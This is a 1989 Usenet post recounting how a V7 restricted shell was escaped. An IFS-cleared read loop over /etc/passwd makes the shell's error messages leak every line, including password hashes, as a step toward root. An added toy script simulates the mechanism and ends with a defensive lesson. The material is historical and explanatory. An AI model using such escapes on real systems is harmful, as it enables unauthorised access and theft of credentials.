merlyn@intelob.biin.com (Randal L. Schwartz @ Stonehenge) (01/01/89)
In article <366@siswat.UUCP>, buck@siswat (A. Lester Buck) writes:
| [stuff about setting PATH in an 'sh -r'...]
| Even this setup is described as "not
| really very secure." We can all imagine some interesting attacks.
| Just nothing as trivial as "$ sh".

I think it was research!bwk (Kernighan) that posted an article about
four years ago that detailed the following scenario:

He and a cohort were provided a login on another Bell Labs UNIX box
(running V7, or something non-BSD-like) with the following restrictions:

  (1) Login shell = /bin/rsh
  (2) PATH= (that is, nothing in the PATH)
  (3) non-writable, empty (but existent) $HOME directory
  (4) No other hints

They said that they broke root in under an hour. Here was their method
of attack:

  (1) login
  (2) enter:

        IFS=
        while read a
        do $a
        done </etc/passwd

  (3) shell responds with:

        root:asdfasdf123:0:0:The Root:/:/bin/sh: restricted
        nextuser:12341234asd:1:1:A Luser:/usr/nextuser:/bin/csh: restricted
        ...

In other words, out comes the /etc/passwd file. Now, apply standard
break-in techniques. :-)

Essentially, you could read any public file on the system with this
built-in cat(1).

So, the summary was something like "something as powerful as the
language of the shell cannot be restricted sufficiently to warrant its
use in a limited environment and still be useful." (A very bad
paraphrase... someone wanna dredge that article up if they have it? :-)

-- 
Randal L. Schwartz, Stonehenge Consulting Services (503)777-0095
on contract to BiiN Technical Information Services (for now :-),
in a former Intel building in Hillsboro, Oregon, USA.
<merlyn@intelob.biin.com> or ...!tektronix!inteloa[!intelob]!merlyn
SOME MAILERS REQUIRE <merlyn@intelob.intel.com> GRRRRR!
Standard disclaimer: I *am* my employer!
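The mechanism in the post, as an added toy model that is not part of the original article: with IFS cleared, each line of the file becomes a single command word, and the restricted shell's own diagnostic names that word, so the refusal message is the disclosure channel. The "command names containing / are refused" rule is taken from the V7 rsh(1) manual and is an assumption here; rsh_dispatch, leak_via_loop and the sample password file are constructed for this illustration and never execute anything.

```shell
#!/bin/sh
# Added illustration, not code from the original post.  A stand-in for the
# restricted shell's command dispatch: it applies only the V7 rsh rule
# "command names containing / are refused" (assumption) and, like the real
# shell, repeats the offending word in its diagnostic.  Nothing is run.
rsh_dispatch() {
    case "$1" in
        */*) printf '%s: restricted\n' "$1" ;;
        *)   printf '%s: not found\n'  "$1" ;;   # PATH is empty, so nothing resolves
    esac
}

# The loop from the post.  IFS= makes the whole line one word, so every
# line reaches the dispatcher intact and comes straight back in its
# diagnostic: a cat(1) built from nothing but shell builtins.
leak_via_loop() {
    while IFS= read -r a
    do
        rsh_dispatch "$a"
    done <"$1"
}

# How many lines of a file would be echoed back this way.
count_leaked_lines() {
    leak_via_loop "$1" | grep -c ': restricted$'
}

# Constructed sample password file standing in for /etc/passwd.
SAMPLE_PASSWD=$(mktemp)
cat >"$SAMPLE_PASSWD" <<'EOF'
root:asdfasdf123:0:0:The Root:/:/bin/sh
nextuser:12341234asd:1:1:A Luser:/usr/nextuser:/bin/csh
EOF
```

The defensive lesson is the one Kernighan drew: a deny-list on command names cannot contain a language that still has read, variable expansion and loops, so confinement has to come from outside the shell (a chroot, a separate account, or file permissions on the data), not from a restricted dialect of it.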